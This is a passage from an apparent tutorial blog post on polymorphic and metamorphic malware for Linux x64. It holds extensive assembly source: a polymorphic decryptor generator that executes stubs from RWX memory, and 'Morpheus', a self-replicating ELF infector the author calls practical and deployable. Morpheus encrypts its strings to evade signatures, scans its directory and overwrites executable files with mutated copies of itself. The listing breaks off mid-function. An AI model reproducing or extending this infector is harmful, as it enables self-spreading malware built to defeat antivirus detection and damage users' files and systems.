    cmp al, REG_RAX                             ; avoid rax as count
    je .retry_count
    cmp al, [rel reg_base]
    je .retry_count
    mov [rel reg_count], al

.retry_key:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_key
    cmp al, [rel reg_base]
    je .retry_key
    cmp al, [rel reg_count]
    je .retry_key
    mov [rel reg_key], al

.retry_junk1:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk1
    mov [rel junk_reg1], al

.retry_junk2:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk2
    cmp al, [rel junk_reg1]
    je .retry_junk2
    mov [rel junk_reg2], al

.retry_junk3:
    call next_random
    and rax, 15
    cmp al, REG_RSP
    je .retry_junk3
    cmp al, [rel junk_reg1]
    je .retry_junk3
    cmp al, [rel junk_reg2]
    je .retry_junk3
    mov [rel junk_reg3], al
    ret

; select algorithm
set_al:
    call next_random
    and rax, 3
    mov [rel alg0_dcr], al
    ret

; generate prologue
gen_p:
    call gen_jmp
    call trash
    call yes_no
    test rax, rax
    jz .skip_trash1
    call trash
.skip_trash1:

    ; mov reg_key,key
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0xB8
    add al, [rel reg_key]
    stosb
    mov byte [rel prolog_set], 1
    mov rax, [rel key]
    stosq

    call yes_no
    test rax, rax
    jz .skip_trash2
    call trash
.skip_trash2:
    ret

; generate decrypt loop
gen_dec:
    mov [rel jmp_back], rdi

    call trash
    call gen_jmp

    ; mov reg_base,rdi (data pointer)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xF8
    add al, [rel reg_base]
    stosb

    call trash
    call gen_jmp

    ; mov reg_count,rsi (size)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xF0
    add al, [rel reg_count]
    stosb

    call trash
    call gen_jmp

.decr_loop:
    movzx rax, byte [rel alg0_dcr]
    cmp al, 0
    je .gen_algo_0
    cmp al, 1
    je .gen_algo_1
    cmp al, 2
    je .gen_algo_2
    jmp .gen_algo_3

.gen_algo_0:
    ; add/rol/xor
    call gen_add_mem_key
    call trash
    call gen_trash
    call gen_rol_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_1:
    ; xor/rol/xor
    call gen_xor_mem_key
    call trash
    call gen_trash
    call gen_rol_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_2:
    ; sub/ror/xor
    call gen_sub_mem_key
    call trash
    call gen_trash
    call gen_ror_mem_16
    call trash
    call gen_trash
    call gen_xor_mem_key
    jmp .gen_loop_end

.gen_algo_3:
    ; xor/add/xor
    call gen_xor_mem_key
    call trash
    call gen_trash
    call gen_add_mem_key
    call trash
    call gen_trash
    call gen_xor_mem_key

.gen_loop_end:
    call trash
    call gen_jmp

    mov al, ADD_REG_IMM8
    stosb
    mov al, 0xC0
    add al, [rel reg_base]
    stosb
    mov al, 8
    stosb

    call trash
    call gen_jmp

    ; generate DEC instruction
    movzx rax, byte [rel reg_count]
    cmp al, 8
    jb .dec_no_rex
    mov al, 0x49                                ; rex.wb for r8-r15
    stosb
    movzx rax, byte [rel reg_count]
    sub al, 8
    jmp .dec_encode
.dec_no_rex:
    mov al, 0x48                                ; rex.w for rax-rdi
    stosb
    movzx rax, byte [rel reg_count]
.dec_encode:
    mov ah, 0xFF
    xchg al, ah
    stosw
    mov al, 0xC8
    add al, [rel reg_count]
    and al, 7
    stosb

    mov al, TEST_REG_REG
    stosb
    mov al, [rel reg_count]
    shl al, 3
    add al, [rel reg_count]
    add al, 0xC0
    stosb

    mov ax, JNZ_LONG
    stosw
    mov rax, [rel jmp_back]
    sub rax, rdi
    sub rax, 4
    neg eax
    stosd
    ret

; algorithm generators
gen_add_mem_key:
    call gen_jmp
    mov al, ADD_MEM_REG
    stosb
    mov dl, [rel reg_key]
    shl dl, 3
    mov al, [rel reg_base]
    add al, dl
    stosb
    ret

gen_sub_mem_key:
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0x29
    stosb
    mov dl, [rel reg_key]
    shl dl, 3
    mov al, [rel reg_base]
    add al, dl
    stosb
    ret

gen_xor_mem_key:
    call gen_jmp
    mov ax, XOR_MEM_REG
    mov dl, [rel reg_key]
    shl dl, 3
    mov ah, [rel reg_base]
    add ah, dl
    stosw
    ret

gen_rol_mem_16:
    call gen_jmp
    mov al, 0x48
    stosb
    mov ax, ROL_MEM_IMM
    add ah, [rel reg_base]
    stosw
    mov al, 16
    stosb
    ret

gen_ror_mem_16:
    call gen_jmp
    mov al, 0x48
    stosb
    mov al, 0xC1
    stosb
    mov al, 0x08
    add al, [rel reg_base]
    stosb
    mov al, 16
    stosb
    ret

; basic junk
trash:
    call yes_no
    test rax, rax
    jz .skip_push_pop

    movzx rax, byte [rel junk_reg1]            ; push/pop junk
    cmp al, 8
    jb .push_no_rex
    mov al, 0x41
    stosb
    movzx rax, byte [rel junk_reg1]
    sub al, 8
.push_no_rex:
    add al, PUSH_REG
    stosb

    movzx rax, byte [rel junk_reg2]
    cmp al, 8
    jb .pop_no_rex
    mov al, 0x41
    stosb
    movzx rax, byte [rel junk_reg2]
    sub al, 8
.pop_no_rex:
    add al, POP_REG
    stosb
.skip_push_pop:

    call gen_jmp
    ret

; jumps
gen_jmp:
    call yes_no
    test rax, rax
    jz .short_jmp
    mov al, JMP_REL32
    stosb
    mov eax, 1
    stosd
    call next_random
    and al, 0xFF
    stosb
    jmp .jmp_exit
.short_jmp:
    mov al, JMP_SHORT
    stosb
    mov al, 1
    stosb
    call next_random
    and al, 0xFF
    stosb
.jmp_exit:
    ret

; self-modifying junk
gen_self:
    mov al, CALL_REL32
    stosb
    mov eax, 3
    stosd
    mov al, JMP_REL32
    stosb
    mov ax, 0x04EB
    stosw

    call next_random
    and rax, 2
    lea rdx, [rel junk_reg1]
    movzx rdx, byte [rdx + rax]

    mov al, POP_REG
    add al, dl
    stosb
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC0
    add al, dl
    stosb
    mov al, PUSH_REG
    add al, dl
    stosb
    mov al, RET_OPCODE
    stosb
    ret

; advanced junk procedures
gen_trash:
    call yes_no
    test rax, rax
    jz .try_proc2

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov ax, 0x07EB
    stosw
    mov al, 0x55
    stosb
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xE5
    stosb
    mov ax, FNINIT_OPCODE
    stosw
    mov al, 0x5D
    stosb
    mov al, RET_OPCODE
    stosb
    jmp .exit_trash

.try_proc2:
    call yes_no
    test rax, rax
    jz .try_proc3

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov ax, 0x0AEB
    stosw
    mov al, 0x60
    stosb
    mov eax, 0xD12BC333
    stosd
    mov eax, 0x6193C38B
    stosd
    mov al, 0x61
    stosb
    mov al, RET_OPCODE
    stosb
    jmp .exit_trash

.try_proc3:
    call yes_no
    test rax, rax
    jz .exit_trash

    mov al, CALL_REL32
    stosb
    mov eax, 2
    stosd
    mov eax, 0x525010EB
    stosd
    mov ax, 0xC069
    stosw
    mov eax, 0x90
    stosd
    mov al, 0x2D
    stosb
    mov eax, 0xDEADC0DE
    stosd
    mov ax, 0x585A
    stosw
    mov al, RET_OPCODE
    stosb

.exit_trash:
    ret

; dummy procedures
gen_dummy:
    call yes_no
    test rax, rax
    jz .skip_dummy

    mov al, CALL_REL32
    stosb
    mov eax, 15
    stosd

    mov al, 0x48
    stosb
    mov al, TEST_REG_REG
    stosb
    mov al, 0xC0
    stosb

    mov al, JZ_SHORT
    stosb
    mov al, 8
    stosb

    mov al, 0x55
    stosb
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xE5
    stosb

    mov ax, FNINIT_OPCODE
    stosw
    mov ax, FNOP_OPCODE
    stosw

    call next_random
    and rax, 0xFF
    mov al, 0x48
    stosb
    mov al, 0xB8
    stosb
    stosq

    mov al, 0x5D
    stosb
    mov al, RET_OPCODE
    stosb

.skip_dummy:
    ret

; execute generated stub
exec_c:
    push rbp
    mov rbp, rsp
    sub rsp, 32
    push rbx
    push r12
    push r13
    push r14
    push r15

    mov r12, rdi                                ; stub code
    mov r13, rsi                                ; stub size
    mov r14, rdx                                ; payload data

    ; validate input
    test r12, r12
    jz .error
    test r13, r13
    jz .error
    cmp r13, 1
    jb .error
    cmp r13, 65536
    ja .error

    mov rax, 9                                  ; mmap
    mov rdi, 0
    mov rsi, r13
    add rsi, 4096                               ; padding
    mov rdx, 0x7                                ; rwx
    mov r10, 0x22                               ; private|anon
    mov r8, -1
    mov r9, 0
    syscall

    cmp rax, -1
    je .error
    test rax, rax
    jz .error
    mov rbx, rax

    ; copy stub to executable memory
    mov rdi, rbx
    mov rsi, r12
    mov rcx, r13
    rep movsb

    ; execute stub
    cmp rbx, 0x1000
    jb .error
    call rbx

    ; cleanup
    mov rax, 11                                 ; munmap
    mov rdi, rbx
    mov rsi, r13
    add rsi, 4096
    syscall

    mov rax, 1                                  ; success
    jmp .done

.error:
    xor rax, rax

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 32
    pop rbp
    ret
Enter fullscreen mode Exit fullscreen mode

Current Limitations

At present, it is strictly limited to Linux x64 because of direct syscall dependencies: the mmap usage is customized for Linux, and register conventions are bound to x64. Porting to Windows would require adapting calling conventions and likely rewriting large parts of the engine logic. macOS has its own syscall numbers and memory protection details, so it would not run with simple changes.

The algorithm set is deliberately limited to four variants. This scale is sufficient to prove the concept without making the system overly complex or fragile. Expanding to dozens of equivalent variants is feasible but significantly increases the risk of introducing bugs and requires careful balancing of complexity and correctness.

There is currently no runtime recompilation mechanism: each variant is generated once and remains static during execution. Self-modifying variants could further improve evasion but introduce instability and substantially raise implementation cost.

Future directions could include:

  • Adding a syscall abstraction layer for true cross-platform support (Linux, Windows, macOS).
  • Expanding the algorithm set and improving encryption/obfuscation (currently quite crude in this area).
  • Building a dynamic rewriting engine that supports self-modifying payloads.

Even in its current form, it has already achieved the core goals: functional correctness, deep signature diversity, entropy-driven key generation, intelligent junk injection, and multi-layered polymorphic structure. Implementation details can vary, but these foundational principles remain stable.

This is a foundational polymorphic engine, intentionally designed to be “usable and clear.” You can use it first to understand the core techniques, then build upon it. Once you internalize these layers of entropy, obfuscation, and instruction encoding, you can take it in any direction you choose.

What Truly Makes Code Mutable

Metamorphic code is more than obfuscation — it rewrites itself. On every execution, it parses its own binary, locates mutable regions, and replaces them with semantically equivalent but syntactically different instruction sequences.

For a simple task like clearing a register, you can use XOR RAX, RAX, SUB RAX, RAX, MOV RAX, 0, or even PUSH 0; POP RAX. Same effect, different opcodes. To a static scanner, these are often unrelated.

A metamorphic engine exploits this by maintaining an instruction-level replacement catalog. Each iteration applies randomized transformations: register renaming, safe reordering of instructions, junk code insertion, and control-flow reconstruction. Logic remains unchanged, but layout continuously evolves.

Combined with replication propagation, each infected binary carries mutations from its “parent” and adds new mutations during infection. Over time, this creates a family of functionally equivalent but structurally distinct samples. No fixed signatures, no stable patterns — only continuous evolution at the opcode level. This is why it is often called “assembly heaven.”

Classic Reference: MetaPHOR

In 2002, there was a very solid article dissecting metamorphic engine structure: The Mental Driller’s “How I Made MetaPHOR and What I’ve Learned.” Yes, 2002 — ancient by today’s standards, but the core principles remain strikingly relevant. Some adaptation is needed for modern systems, but the underlying mechanisms are still solid.

Polymorphism focuses on camouflage: adjusting the decryptor, wrapping the payload, keeping the core static. Metamorphism discards the shell and directly modifies the interior. It disassembles complete code blocks, rewrites them from scratch, and reassembles the binary — producing new logical layouts, altered control flow, and shifted instruction patterns. Every landing looks different.

It is not just renaming registers or sprinkling NOPs. It is full-code-level mutation — deep structural churning that leaves no stable anchor points for static fingerprints.

— Disassembly and Shrinking —

To mutate, a virus (VX) must first disassemble itself into an internal pseudo-assembly format — a custom abstraction layer that makes original opcodes readable and transformable. It breaks apart its instruction stream, decodes jumps, calls, and conditional branches, then maps control flow into manageable data structures.

After disassembly, the code is written into a memory buffer. Pointer tables are built for jump targets, call destinations, and other critical control elements to ensure relationships are not broken during rewriting.

Next comes the shrinker. This stage scans for bloated instruction sequences and compresses them into minimal equivalent forms.

Original Instruction Compressed Instruction Description
MOV reg, reg NOP Dead operation with no effect
XOR reg, reg MOV reg, 0 Clear the register

The shrinker’s job is to trim fat: fold redundant chains, clean up leftovers, and free space for the next round of mutation.

— Permutation and Expansion —

After shrinking comes the permutator. Its task is shuffling: reordering instructions and injecting entropy while keeping logic intact, making layout unpredictable.

It also replaces equivalent instructions: same result, different operation.

Following permutation is the expander — the opposite of the shrinker. It expands single instructions into equivalent two- or three-instruction sequences. Recursive expansion continuously increases code complexity.

Control variables impose hard limits to prevent unbounded growth.

Finally, the assembler finishes the job: it reassembles the mutated code back into valid machine code.

Only after completing this loop does the VX become a structurally unique but functionally complete new variant. Payload unchanged, appearance brand new.

— Generational Generation —

You have seen how we do this in polymorphism: injecting junk code and replacing registers. Metamorphic thinking is similar but goes much deeper.

When the VX completes its self-rewrite in memory, it writes the new variant back to disk. Every execution produces a “new copy” containing random junk code and rewritten logic.

vx-junk-disasm

Notice those JUNK macro calls? They are randomly scattered. Each is a marker — a hook point that can be safely modified. Smart Trash: deliberately useless, designed specifically to interfere with disassemblers and scanners.

We use a dedicated scanning function to handle them. It traverses the code, looks for PUSH/POP patterns on the same registers (spaced 8 bytes apart), and marks the hit locations. Once marked, these junk segments are overwritten with new, harmless, randomized replacement sequences.

This loop is the core. It hunts for JUNK sequences and replaces them with new random instruction chains on every run. Each JUNK call marks a modifiable slot — essentially a sandboxed code region for generational mutation. Behavior harmless, structure chaotic.

After mutation completes, the VX propagates by copying the new variant into executable files discovered in the same directory. The copy has changed structure but unchanged behavior. True polymorphic/metamorphic malware is not about “fooling AV once,” but about continuous mutation — reshaping the binary with every “breath.” As long as logic remains intact and structure keeps changing, static detection struggles to gain a foothold.

This is only the minimal viable set, covering the key mechanisms. It demonstrates the core path that allows VX code to mutate and survive. There is much more to deeper content, but this is the foundation.

Morpheus

Now it is time for the code I mentioned alongside Veil64 to make its appearance.

Morpheus applies metamorphic principles to a real, runnable virus infector. This is not a theoretical demonstration — it is practical and deployable. It shows how a mutation engine can work end-to-end without relying on encryptors or packers.

The core idea is simple: Morpheus treats its own executable code the way a crypter treats a payload. It loads itself into memory, scans for known patterns, applies transformations, then writes out a mutated version that accomplishes the same tasks with different instruction sequences.

On every run, Morpheus roughly does the following:

  • Extracts obfuscated strings and executes its logic
  • Loads its own .text section
  • Disassembles code blocks
  • Identifies mutation points (NOPs, junk patterns, simple MOV/XOR operations, etc.)
  • Applies transformations (register shuffling, instruction replacement, code block reordering or expansion)
  • Generates structurally different but logically consistent code
  • Writes the mutated binary to a new target (usually another ELF in the same directory)
  • Patches headers as needed to keep it executable

Every generation is truly different — not just added junk and register swaps, but substantive structural change — while the payload and functionality remain fully intact. This allows Morpheus to self-replicate on every execution, rendering static signature detection unreliable. Combined with runtime transformation and actual rewriting of files on disk, traditional scanning methods struggle to track it consistently.

Junk code is always a balancing act. In Veil64 we used relatively basic junk padding. Here is a 10-byte sequence that has zero net effect but can easily be mistaken for compiler-generated register preservation code:

PUSH RAX
PUSH RBX
XCHG RAX, RBX
XCHG RAX, RBX
POP RBX
POP RAX
Enter fullscreen mode Exit fullscreen mode

Morpheus makes heavy use of such sequences. The JUNK macro marks these blocks, and on every execution the engine scans and replaces them with structurally different but functionally equivalent junk patterns.

We implemented four register combinations for smart junk patterns. Each variant follows the same logic but uses different register pairs, producing unique byte sequences. These variants are functionally identical with zero side effects, yet their binary signatures change completely.

String Encryption

All strings are encrypted to evade static signature detection. I used a simple XOR scheme: each string gets its own key, and decryption is a single XOR pass. Why XOR? Because it is fast.

Decryption runs once at startup. To add extra resistance, I included INT3 trap shellcode to disrupt debugger flow.

— Infection —

During the infection stage, we scan the directory for ELF binaries. The scanner performs several basic checks to filter out garbage files and retain only viable ELF executable targets (regular files, no hidden files, valid ELF magic, executable and writable permissions).

Before any overwrite, it creates a hidden backup prefixed with .morph8. If the backup already exists, infection is skipped — acting as an “already morphed” marker.

— Morpheus Engine —

;;
;;     M O R P H E U S   [ polymorphic ELF infector ]
;;     ------------------------------------------------
;;     stealth // mutation // syscall-only // junked //
;;     ------------------------------------------------
;;     0xBADC0DE // .morph8 // Linux x86_64 // 0xf00sec
;;

%define PUSH 0x50
%define POP 0x58
%define MOV 0xB8
%define NOP 0x90
%define REX_W 0x48
%define XCHG_OP 0x87
%define XCHG_BASE 0xC0

%define ADD_OP 0x01
%define AND_OP 0x21
%define XOR_OP 0x31
%define OR_OP 0x09
%define SBB_OP 0x19
%define SUB_OP 0x29

%define JUNKLEN 10

; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
%macro JUNK 0
    db 0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58
%endmacro

section .data

; ELF header
ELF_MAGIC       dd 0x464C457F
ELF_CLASS64     equ 2
ELF_DATA2LSB    equ 1
ELF_VERSION     equ 1
ELF_OSABI_SYSV  equ 0
ET_EXEC         equ 2
ET_DYN          equ 3
EM_X86_64       equ 62

prefixes db ADD_OP, AND_OP, XOR_OP, OR_OP, SBB_OP, SUB_OP, 0

bin_name times 256 db 0
orig_exec_name times 256 db 0
msg_cat db " /\_/\ ",10
        db "( o.o )",10
        db " > ^ <",10,0                    ; payload
current_dir db "./",0
; encrypted strings
cmhd                db 0x36, 0x3D, 0x38, 0x3A, 0x31, 0x75, 0x7E, 0x2D, 0x75, 0x70, 0x26, 0x55     ; "chmod +x %s"
tchh                db 0xAF, 0xA4, 0xA1, 0xA3, 0xA8, 0xEC, 0xE7, 0xB4, 0xEC, 0xE9, 0xBF, 0xCC     ; "chmod +x %s"
touc                db 0xDE, 0xC5, 0xDF, 0xC9, 0xC2, 0x8A, 0x8F, 0xD9, 0xAA                         ; "touch %s"
cpcm                db 0x9C, 0x8F, 0xDF, 0xDA, 0x8C, 0xDF, 0xDA, 0x8C, 0xFF                         ; "cp %s %s"
hidd                db 0x59, 0x1A, 0x18, 0x05, 0x07, 0x1F, 0x4F, 0x77                               ; ".morph8"
exec                db 0x1D, 0x1C, 0x16, 0x40, 0x33                                                 ; "./%s"
vxxe                db 0xFE, 0xF0, 0xF0, 0x88                                                       ; "vxx"

xor_keys            db 0xAA, 0x55, 0xCC, 0x33, 0xFF, 0x88, 0x77
vierge_val          db 1                                                                           ; first generation marker
signme              dd 0xF00C0DE                                                                   ; PRNG seed

section .bss
    code            resb 65536      ; viral body
    codelen         resq 1
    vierge          resb 1          ; generation flag
    dir_buf         resb 4096
    temp_buf        resb 1024
    elf_header      resb 64

; runtime decrypted strings
touch_cmd_fmt resb   32
chmod_cmd_fmt resb   32
touch_chmod_fmt resb 32
exec_cmd_fmt resb    32
cp_cmd_fmt resb      32
vxx_str resb         8
hidden_prefix resb   16

section .text
    global _start

%define SYS_read      0
%define SYS_write     1
%define SYS_open      2
%define SYS_close     3
%define SYS_exit      60
%define SYS_lseek     8
%define SYS_getdents64 217
%define SYS_access    21
%define SYS_getrandom 318
%define SYS_execve    59
%define SYS_fstat     5
%define SYS_mmap      9
%define SYS_brk       12
%define SYS_fork      57
%define SYS_wait4     61

%define F_OK 0
%define X_OK 1
%define W_OK 2

%define O_RDONLY 0
%define O_WRONLY 1
%define O_RDWR   2
%define O_CREAT  64
%define O_TRUNC  512

%define PROT_READ  1
%define PROT_WRITE 2
%define MAP_PRIVATE 2
%define MAP_ANONYMOUS 32

section .rodata
    shell_path db "/bin/sh",0
    sh_arg0 db "sh",0
    sh_arg1 db "-c",0

; syscall wrappers with junk insertion

sys_write:
    mov rax, SYS_write
    JUNK
    syscall
    ret

sys_read:
    mov rax, SYS_read
    JUNK
    syscall
    ret

sys_open:
    mov rax, SYS_open
    JUNK
    syscall
    ret

sys_close:
    mov rax, SYS_close
    syscall
    ret

sys_lseek:
    mov rax, SYS_lseek
    syscall
    ret

sys_access:
    mov rax, SYS_access
    syscall
    ret

sys_getdents64:
    mov rax, SYS_getdents64
    syscall
    ret

sys_exit:
    mov rax, SYS_exit
    syscall

; validate ELF executable target
is_elf:
    push r12
    push r13

    mov rsi, O_RDONLY
    xor rdx, rdx
    call sys_open
    test rax, rax
    js .not_elf
    mov r12, rax

    mov rdi, r12
    mov rsi, elf_header
    mov rdx, 64
    call sys_read

    push rax
    mov rdi, r12
    call sys_close
    pop rax

    cmp rax, 64
    jl .not_elf

    ; validate ELF magic
    mov rsi, elf_header
    cmp dword [rsi], 0x464C457F
    jne .not_elf

    ; 64-bit only
    cmp byte [rsi + 4], 2
    jne .not_elf

    ; executable or shared object
    mov ax, [rsi + 16]
    cmp ax, 2
    je .valid
    cmp ax, 3
    jne .not_elf

.valid:
    mov rax, 1
    jmp .done

.not_elf:
    xor rax, rax

.done:
    pop r13
    pop r12
    ret

; string utilities

basename:                           ; extract filename from path
    mov rax, rdi
    mov rsi, rdi
.find_last_slash:
    mov bl, [rsi]
    cmp bl, 0
    je .done
    cmp bl, '/'
    jne .next_char
    inc rsi
    mov rax, rsi
    jmp .find_last_slash
.next_char:
    inc rsi
    jmp .find_last_slash
.done:
    ret

strlen:
    mov rdi, rdi
    xor rcx, rcx
.strlen_loop:
    cmp byte [rdi + rcx], 0
    je .strlen_done
    inc rcx
    jmp .strlen_loop
.strlen_done:
    mov rax, rcx
    ret

strcpy:
    mov rdi, rdi
    mov rsi, rsi
    mov rax, rdi
.cp_loop:
    mov bl, [rsi]
    mov [rdi], bl
    inc rdi
    inc rsi
    cmp bl, 0
    jne .cp_loop
    ret

strcmp:
    push rdi
    push rsi
.cmp_loop:
    mov al, [rdi]
    mov bl, [rsi]
    cmp al, bl
    jne .not_equal
    test al, al
    jz .equal
    inc rdi
    inc rsi
    jmp .cmp_loop
.equal:
    xor rax, rax
    jmp .done
.not_equal:
    movzx rax, al
    movzx rbx, bl
    sub rax, rbx
.done:
    pop rsi
    pop rdi
    ret

strstr:
    mov r8, rdi
    mov r9, rsi

    mov al, [r9]
    test al, al
    jz .found

.scan:
    mov bl, [r8]
    test bl, bl
    jz .not_found

    cmp al, bl
    je .check_match
    inc r8
    jmp .scan

.check_match:
    mov r10, r8
    mov r11, r9

.match_loop:
    mov al, [r11]
    test al, al
    jz .found

    mov bl, [r10]
    test bl, bl
    jz .not_found

    cmp al, bl
    jne .next_pos

    inc r10
    inc r11
    jmp .match_loop

.next_pos:
    inc r8
    jmp .scan

.found:
    mov rax, r8
    ret

.not_found:
    xor rax, rax
    ret

; PRNG
get_random:
    mov eax, [signme]
    mov edx, eax
    shr edx, 1
    xor eax, edx
    mov edx, eax
    shr edx, 2
    xor eax, edx
    mov [signme], eax
    ret

get_range:                          ; random in range 0-ecx
    call get_random
    xor edx, edx
    div ecx
    mov eax, edx
    ret

; decrypt string with indexed key
d_strmain:
    push rax
    push rbx
    push rcx
    push rdx
    push r8

    mov r8, xor_keys
    add r8, rcx
    mov al, [r8]

    mov rcx, rdx

    ; clear dest buffer
    push rdi
    push rcx
    mov rdi, rsi
    mov rcx, rdx
    xor bl, bl
    rep stosb
    pop rcx
    pop rdi

.d_loop:
    test rcx, rcx
    jz .d_done

    mov bl, [rdi]
    xor bl, al
    mov [rsi], bl

    inc rdi
    inc rsi
    dec rcx
    jmp .d_loop

.d_done:
    pop r8
    pop rdx
    pop rcx
    pop rbx
    pop rax
    ret

; decrypt all strings at runtime
d_str:
    push rdi
    push rsi
    push rdx
    push rcx

    mov rdi, touc
    mov rsi, touch_cmd_fmt
    mov rdx, 9
    mov rcx, 0
    call d_strmain

    mov rdi, cmhd
    mov rsi, chmod_cmd_fmt
    mov rdx, 12
    mov rcx, 1
    call d_strmain

    mov rdi, tchh
    mov rsi, touch_chmod_fmt
    mov rdx, 12
    mov rcx, 2
    call d_strmain

    mov rdi, exec
    mov rsi, exec_cmd_fmt
    mov rdx, 5
    mov rcx, 3
    call d_strmain

    mov rdi, cpcm
    mov rsi, cp_cmd_fmt
    mov rdx, 9
    mov rcx, 4
    call d_strmain

    mov rdi, vxxe
    mov rsi, vxx_str
    mov rdx, 4
    mov rcx, 5
    call d_strmain

    mov rdi, hidd
    mov rsi, hidden_prefix
    mov rdx, 8
    mov rcx, 6
    call d_strmain

    pop rcx
    pop rdx
    pop rsi
    pop rdi
    ret

; 4 variants
spawn_junk:
    push rbx
    push rcx
    push rdx
    push r8

    mov r8, rdi               ; dst buffer

    call get_random
    and eax, 3                ; 4 variants

    cmp eax, 0
    je .variant_0
    cmp eax, 1
    je .variant_1
    cmp eax, 2
    je .variant_2
    jmp .variant_3

.variant_0:
    ; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
    mov byte [r8], 0x50
    mov byte [r8+1], 0x53
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xC3
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xC3
    mov byte [r8+8], 0x5B
    mov byte [r8+9], 0x58
    jmp .done

.variant_1:
    ; push rcx,rdx; xchg rcx,rdx; xchg rcx,rdx; pop rdx,rcx
    mov byte [r8], 0x51
    mov byte [r8+1], 0x52
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xCA
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xCA
    mov byte [r8+8], 0x5A
    mov byte [r8+9], 0x59
    jmp .done

.variant_2:
    ; push rax,rcx; xchg rax,rcx; xchg rax,rcx; pop rcx,rax
    mov byte [r8], 0x50
    mov byte [r8+1], 0x51
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xC1
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xC1
    mov byte [r8+8], 0x59
    mov byte [r8+9], 0x58
    jmp .done

.variant_3:
    ; push rbx,rdx; xchg rbx,rdx; xchg rbx,rdx; pop rdx,rbx
    mov byte [r8], 0x53
    mov byte [r8+1], 0x52
    mov byte [r8+2], 0x48
    mov byte [r8+3], 0x87
    mov byte [r8+4], 0xD3
    mov byte [r8+5], 0x48
    mov byte [r8+6], 0x87
    mov byte [r8+7], 0xD3
    mov byte [r8+8], 0x5A
    mov byte [r8+9], 0x5B

.done:
    pop r8
    pop rdx
    pop rcx
    pop rbx
    ret

; file I/O
read_f:
    push r12
    push r13
    push r14
    push r15

    mov r15, rsi            ; save buffer pointer

    mov rax, SYS_open
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall
    test rax, rax
    js .error

    mov r12, rax

    mov rax, SYS_fstat
    mov rdi, r12
    sub rsp, 144
    mov rsi, rsp
    syscall
    test rax, rax
    js .close_e

    mov r13, [rsp + 48]     ; file size from stat
    add rsp, 144

    ; bounds check
    cmp r13, 65536
    jle .size_ok
    mov r13, 65536
.size_ok:
    test r13, r13
    jz .empty

    xor r14, r14            ; bytes read cnt

.read_loop:
    mov rax, SYS_read
    mov rdi, r12
    mov rsi, r15
    add rsi, r14            ; offset into buffer
    mov rdx, r13
    sub rdx, r14            ; remaining bytes to read
    jz .read_done
    syscall

    test rax, rax
    jle .read_done          ; EOF or error
    add r14, rax
    cmp r14, r13
    jl .read_loop

.read_done:
    mov rax, SYS_close
    mov rdi, r12
    syscall

    mov rax, r14            ; return bytes read
    jmp .done

.empty:
    mov rax, SYS_close
    mov rdi, r12
    syscall
    xor rax, rax

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    ret

.close_e:
    add rsp, 144
    mov rax, SYS_close
    mov rdi, r12
    syscall

.error:
    mov rax, -1
    pop r15
    pop r14
    pop r13
    pop r12
    ret

write_f:
    push rbp
    mov rbp, rsp
    push r12
    push r13
    push r14
    push r15

    mov r12, rdi            ; filename
    mov r13, rsi            ; buffer
    mov r14, rdx            ; size

    ; validate inputs
    test r12, r12
    jz .write_er
    test r13, r13
    jz .write_er
    test r14, r14
    jz .write_s

    mov rdi, r12
    mov rsi, O_WRONLY | O_CREAT | O_TRUNC
    mov rdx, 0755o
    call sys_open
    cmp rax, 0
    jl .write_er
    mov r12, rax            ; fd

    xor r15, r15            ; bytes written cnt

.write_lp:
    mov rdi, r12
    mov rsi, r13
    add rsi, r15            ; offset into buffer
    mov rdx, r14
    sub rdx, r15            ; remaining bytes
    jz .write_c
    call sys_write
    JUNK

    test rax, rax
    jle .r_close
    add r15, rax
    cmp r15, r14
    jl .write_lp

.write_c:
    mov rdi, r12
    call sys_close

.write_s:
    xor rax, rax            ; success
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

.r_close:
    mov rdi, r12
    call sys_close
.write_er:
    mov rax, -1
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

; instruction generator
trace_op:
    ; bounds check
    mov rax, [codelen]
    cmp rsi, rax
    jae .bounds_er

    mov r8, code
    add r8, rsi

    ; instruction size check
    mov rax, [codelen]
    sub rax, rsi
    cmp rax, 3
    jae .rex_xchg
    cmp rax, 2
    jae .write_prefix
    cmp rax, 1
    jae .write_nop

.bounds_er:
    xor eax, eax
    ret

.write_nop:
    mov byte [r8], NOP
    mov eax, 1
    ret

.write_prefix:
    ; validate register (0-3 only)
    cmp dil, 3
    ja .bounds_er

    call get_random
    and eax, 5
    movzx eax, byte [prefixes + rax]
    mov [r8], al

    call get_random
    and eax, 3              ; rax,rbx,rcx,rdx only
    shl eax, 3
    add eax, 0xC0
    add al, dil
    mov [r8 + 1], al

    mov eax, 2
    ret

.rex_xchg:
    ; generate REX.W XCHG
    cmp dil, 3
    ja .bounds_er

